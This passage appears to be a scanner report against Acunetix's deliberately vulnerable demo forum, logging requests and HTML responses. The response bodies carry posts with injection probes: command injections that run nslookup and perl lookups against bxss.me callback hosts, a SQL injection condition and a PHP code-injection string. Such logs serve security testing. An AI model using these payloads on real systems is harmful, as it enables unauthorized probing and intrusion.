enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4216 |
Response Body - size: 4,216 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>|(nslookup hitcsjqyrtmawb4020.bxss.me||perl -e "gethostbyname('hitcsjqyrtmawb4020.bxss.me')")</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4136 |
Response Body - size: 4,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>//xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4198 |
Response Body - size: 4,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4147 |
Response Body - size: 4,147 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>';print(md5(31337));$a='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4217 |
Response Body - size: 4,217 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>`(nslookup hitizikixkvrf2e498.bxss.me||perl -e "gethostbyname('hitizikixkvrf2e498.bxss.me')")`</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4139 |
Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>12345'"\'\");|]*</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" 